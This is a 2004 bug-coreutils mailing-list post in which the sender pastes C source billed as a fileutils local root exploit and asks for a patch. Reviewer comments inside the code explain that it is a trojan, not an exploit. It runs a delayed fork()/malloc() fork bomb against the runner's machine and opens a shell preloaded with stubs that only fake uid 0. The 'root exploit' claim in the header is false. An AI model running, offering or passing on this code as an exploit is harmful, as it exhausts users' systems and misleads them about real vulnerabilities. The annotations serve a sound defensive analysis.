bug-coreutils

Linux X86 fileutils-4x local root exploit


From: Antti J Hätinen
Subject: Linux X86 fileutils-4x local root exploit
Date: Sat, 19 Jun 2004 17:20:41 +0300

Hi!

 

Is there a patch against this exploit?

 

/* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE 

 * 

 * lsroot.c Linux X86 fileutils-4x local root exploit

 * 

 * Tested under:

 * 

 * Redhat 7.0 fileutils-4.0x-3

 * Redhat 7.1 fileutils-4.0.36-4

 * Redhat 7.2 fileutils-4.1-4

 * Redhat 7.3 fileutils-4.1-10

 * 

 * jason <address@hidden>

*/

 

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

 

/*
 * Despite its name, this array holds no machine code. The hex escapes are
 * plain ASCII and decode to C source text:
 *
 *     int getuid() { return 0; }
 *     int geteuid() { return 0; }
 *     int getgid() { return 0; }
 *     int getegid() { return 0; }
 *
 * The last literal ends with "\x0/bin/sh". '/' is not a hex digit, so the
 * escape is a single NUL byte, and anything that treats the array as a C
 * string stops there. The trailing "/bin/sh" is therefore never used by
 * main() below, which writes the array with "%s".
 */
char hellc0de[] =
"\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"

 
"\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"

 
"\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"

 
"\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"

 
"\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"

 
"\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"

                        "\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh";

 

/*
 * Reviewer's reading of what this program does, from the code alone.
 *
 * Nothing here targets fileutils or ls: no fileutils binary is invoked and
 * no setuid program is involved. The program
 *   1. writes the C text held in hellc0de to /tmp/own.c and builds it into
 *      the shared object /tmp/own.so;
 *   2. forks a child that waits 10 seconds and then forks and allocates
 *      memory in an endless loop;
 *   3. starts /bin/sh with LD_PRELOAD pointing at /tmp/own.so.
 *
 * The preloaded library only replaces getuid/geteuid/getgid/getegid inside
 * that shell, so tools that ask libc for their ids are told 0. The kernel's
 * credentials for the process are unchanged and no privilege is gained. The
 * only real effect is step 2, which exhausts process slots and memory on
 * the machine of whoever runs the program. A fileutils patch is therefore
 * not the relevant mitigation; per-user process limits (RLIMIT_NPROC) are
 * what bound the damage.
 */
int main()

{

        FILE *fp;

        /* Only ever receives malloc() results that are never used or freed. */
        char *offset;

        /* NOTE(review): fopen() result is not checked before use; the path
         * is a fixed, predictable name in /tmp. */
        fp=fopen("/tmp/own.c","w");

        /* "%s" stops at the NUL embedded in hellc0de, so only the four
         * stub functions are written. */
        fprintf(fp,"%s",hellc0de);

        fclose(fp);

 

        /* Builds /tmp/own.so from the stub source and deletes the source.
         * NOTE(review): the string literal below is split across two lines
         * (apparently by mail wrapping), so it does not compile as shown. */
        system("gcc -shared -o /tmp/own.so /tmp/own.c;rm -f
/tmp/own.c");

        /* Child: after a 10 second delay, loop forever calling fork() and
         * leaking 512-byte allocations. Every forked copy runs the same
         * loop, so process count and memory use grow without bound. */
        if (fork() == 0) {

        sleep(10); while (1) { fork(); offset=malloc(512); }

                /* Unreachable: the loop above never exits. */
                exit(0);

        }

        /* Parent: runs a shell with the stub library preloaded. The id
         * lookups in that shell return 0, which can make it appear to be a
         * root shell; it still runs with the caller's real credentials. */
        system("LD_PRELOAD=/tmp/own.so /bin/sh");

        return 0;

}

/* -EOF- */


